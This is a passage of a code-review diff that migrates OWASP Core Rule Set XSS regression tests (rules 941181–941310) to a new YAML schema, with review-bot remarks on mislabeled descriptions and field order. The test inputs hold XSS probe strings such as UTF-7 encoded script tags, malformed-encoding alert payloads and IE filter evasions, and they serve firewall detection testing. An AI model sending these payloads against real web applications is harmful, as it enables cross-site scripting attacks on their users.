agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] 
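Review bot: Test 3's `desc: Node-validator deny list keywords, ARGS_NAMES` appears not to match its input, which carries the keyword in the cookie name (`Cookie: 'window.location=941180-3'`) rather than in an argument name; now that the titles are reduced to numeric `test_id`s, the description is the only place the targeted variable is named, so `desc: Node-validator deny list keywords, REQUEST_COOKIES_NAMES` would keep it accurate. The same mismatch is carried over in 941181.yaml test 4 (`Cookie: '-->=941181-4'` described as ARGS_NAMES), whereas 941190.yaml test 3 already labels its cookie case COOKIES_NAMES. As a minor style point, test 5 writes `version: HTTP/1.0` bare while the other stages in this file quote `"HTTP/1.1"`; both parse as strings, but quoting uniformly reads more consistently.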
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index a6f3217f3..ff7471614 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml 
@@ -1,75 +1,73 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "941181.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941181 tests: - - test_title: 941181-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=-->' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=--%3E' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '-->=941181-3' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '-->=941181-4' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941181" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 6b0f1e2fe..d41e2d48b 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml 
@@ -1,92 +1,90 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "941190.yaml" - description: "Tests to trigger, or not trigger 941190" +rule_id: 941190 tests: - - test_title: 941190-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "941190-1=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "941190-1=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "x=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "x=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '' - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - test_title: 941230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] 
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index b77c0de58..6bd84e2c9 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941240.yaml +rule_id: 941240 tests: - - test_title: 941240-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" - - test_title: 941240-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941240] + - test_id: 2 desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941250] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index d7e14f52c..1cc0cb1dd 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml 
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941260.yaml +rule_id: 941260 tests: - - test_title: 941260-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - test_title: 941260-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" - version: HTTP/1.0 - output: - log_contains: id "941260" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload= +ADw-script+AD4-alert(1)+ADw-/script+AD4-" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] 
diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml index 26a2d797b..dec041596 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941270.yaml 
@@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941270.yaml +rule_id: 941270 tests: - - test_title: 941270-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" - version: HTTP/1.0 - output: - log_contains: id "941270" - - test_title: 941270-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3clink%20%2f%20asdf%20href%20%20%2f%3d%20" + version: HTTP/1.0 + output: + log: + expect_ids: [941270] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=' - output: - log_contains: id "941270" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: 'payload=' + output: + log: + expect_ids: [941270] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml index e34641c10..8d2fa94a2 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
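Review bot: In test 2 the new stage lists `version: HTTP/1.0` before the `data:` line, whereas test 1 of this file and the other migrated files put `version` after the request body; mapping order does not change the request go-ftw sends, but keeping `data` followed by `version` as in test 1 makes the stages line up when reading across files. 941300.yaml test 2 has the same ordering and could be adjusted in the same pass.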
+++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941280.yaml 
@@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941280.yaml +rule_id: 941280 tests: - - test_title: 941280-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941280" - - test_title: 941280-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3cBASE%20dsfds%20HREF%20%2f%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941280] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Length: 113 - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: 'payload=xssxss&var=whatever" - version: HTTP/1.0 - output: - log_contains: id "941290" - - test_title: 941290-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 
"OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941290" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941290] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml index 43909b15a..14f42f240 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941300.yaml 
@@ -1,40 +1,38 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941300.yaml +rule_id: 941300 tests: - - test_title: 941300-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" - version: HTTP/1.0 - output: - log_contains: id "941300" - - test_title: 941300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?%3cOBJECT%20data%20%3d=sdffdsa" + version: HTTP/1.0 + output: + log: + expect_ids: [941300] + - test_id: 2 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: "payload=" - output: - log_contains: id "941300" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: "payload=" + output: + log: + expect_ids: [941300] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml index 453fac17d..14f8c8907 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941310.yaml 
@@ -2,226 +2,225 @@ meta: author: "Christian S.J. Peron, Federico G. Schwindt, azurit" description: US-ASCII Malformed Encoding XSS Filter - enabled: true - name: 941310.yaml +rule_id: 941310 tests: - - test_title: 941310-1 + - test_id: 1 desc: Positive test using single byte stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbcscript\xbealert(\xa2XSS\xa2)\xbc/script\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 2 desc: Positive test using utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xc2\xbcscript\xc2\xbealert(\xc2\xa2XSS\xc2\xa2)\xc2\xbc/script\xc2\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 3 desc: Positive test using alternate utf-8 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe - version: "HTTP/1.1" - output: - log_contains: id "941310" - - test_title: 941310-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xd0\xbcscript\xd0\xbealert(\xc2\xa2XSS\xc2\xa2)\xd0\xbc/script\xd0\xbe + version: "HTTP/1.1" + output: + log: + expect_ids: [941310] + - test_id: 4 desc: Real world false positive for old rule with Russian utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" - data: 
var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1942 as "абвгдеёжзийклмнопрстуфхцчшщъыэюя" + data: var=\xd0\xb0\xd0\xb1\xd0\xb2\xd0\xb3\xd0\xb4\xd0\xb5\xd1\x91\xd0\xb6\xd0\xb7\xd0\xb8\xd0\xb9\xd0\xba\xd0\xbb\xd0\xbc\xd0\xbd\xd0\xbe\xd0\xbf\xd1\x80\xd1\x81\xd1\x82\xd1\x83\xd1\x84\xd1\x85\xd1\x86\xd1\x87\xd1\x88\xd1\x89\xd1\x8a\xd1\x8b\xd1\x8d\xd1\x8e\xd1\x8f + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 5 desc: Real world false positive for old rule with German utf-8 characters stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" - data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # Reported in https://github.com/coreruleset/coreruleset/issues/1645 as "de_matten & sitzbez\xc3\xbcge > fu\xc3\x9fmatten_mt" + data: var=de_matten & sitzbez\xc3\x83\xc2\xbcge > fu\xc3\x83\xc2\x9fmatten_mt + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 6 desc: Negative test for opening tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbc\xbc - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: var=\xbc\xbc + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941310] + - test_id: 7 desc: Negative test for closing tag stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: var=\xbe\xbe - version: "HTTP/1.1" - output: - no_log_contains: id "941310" - - test_title: 941310-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Content-Type: "application/x-www-form-urlencoded; charset=us-ascii" + User-Agent: "OWASP CRS test 
